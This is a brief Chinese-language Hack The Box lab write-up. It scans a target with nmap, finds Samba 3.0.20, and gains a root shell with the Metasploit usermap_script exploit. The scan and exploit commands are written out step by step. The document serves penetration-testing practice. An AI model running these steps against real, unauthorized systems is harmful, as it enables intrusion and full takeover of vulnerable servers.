hack the box就不多介绍了。直接上题
1、信息收集
端口扫描
nmap -Pn -sV -sC -A -oN 10.10.10.3.txt 10.10.10.3
参数 | 作用 |
---|---|
-Pn | 如果主机禁用了ping请求,那么扫描将不能很好地进行下去。-Pn就是默认主机已经启动,并进行全套的检查工作 |
-sV | 检查服务端的软件版本,可针对不同版本选择payload |
-sC | 脚本扫描 |
-A | -sC、-sV、-O(检查操作系统),Traceroute |
-oN | 将扫描结果导入文件中 |
我们打开10.10.10.3.txt看看
ftp-anon:支持匿名登录。但是进去ftp看了一圈之后,并没有发现什么可用的信息。
2、漏洞利用
445端口 netbios-ssn Samba smbd 3.0.20-Debian
可见这个东西,正常情况下应该是要被关掉才安全的。既然我们知道了该服务开启,并有了版本号,msf启动。
msf搜索对用的payload
msfconsole
msf> search samba 3.0.20
查看列表,找到rank等级为excellent的payload
msf> use exploit/multi/samba/usermap_script
set RHOSTS 10.10.10.3
exploit
随后等待3秒,
id
可以看到,现在服务器已经是root权限了
找到root.txt,flag到手
game over.
3、经验总结
1、端口扫描知识掌握
2、msf使用以及cve漏洞尝试
3、netbios-ssn Samba这个可能是绝大多数人没有防备,关掉的服务,感觉是个有用的侵入点
不算太难,但是先学套路,多见识题目